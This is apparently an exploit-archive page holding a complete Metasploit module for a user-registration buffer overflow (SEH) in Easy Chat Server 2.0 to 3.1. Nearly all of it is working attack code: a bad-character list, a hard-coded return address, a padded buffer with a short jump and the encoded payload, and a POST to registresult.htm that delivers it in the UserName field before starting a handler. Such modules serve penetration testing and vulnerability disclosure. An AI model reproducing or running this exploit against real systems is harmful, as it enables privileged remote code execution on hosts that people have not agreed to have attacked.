Easy Chat Server User Registeration Buffer Overflow (SEH)

This Metasploit module exploits a buffer overflow during user registration in Easy Chat Server software.


MD5 | ea660b80899722585fc2d5713b8b135f

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
'Description' => %q{
This module exploits a buffer overflow during user registration in Easy Chat Server software.
},
'Author' =>
[
'Marco Rivoli', #Metasploit
'Aitezaz Mohsin' #POC
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '42155' ],
],
'Privileged' => true,
'Payload' =>
{
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
],
'DefaultOptions' => {
'RPORT' => 80,
'EXITFUNC' => 'thread',
'ENCODER' => 'x86/alpha_mixed'
},
'DisclosureDate' => 'Oct 09 2017',
'DefaultTarget' => 0))
end

def exploit
sploit = rand_text_alpha_upper(217)
sploit << "\xeb\x06\x90\x90"
sploit << [target.ret].pack('V')
sploit << payload.encoded
sploit << rand_text_alpha_upper(200)

res = send_request_cgi({
'uri' => normalize_uri(URI,'registresult.htm'),
'method' => 'POST',
'vars_post' => {
'UserName' => sploit,
'Password' => 'test',
'Password1' => 'test',
'Sex' => 1,
'Email' => 'x@',
'Icon' => 'x.gif',
'Resume' => 'xxxx',
'cw' => 1,
'RoomID' => 4,
'RepUserName' => 'admin',
'submit1' => 'Register'
}
})
handler

end
end

Related Posts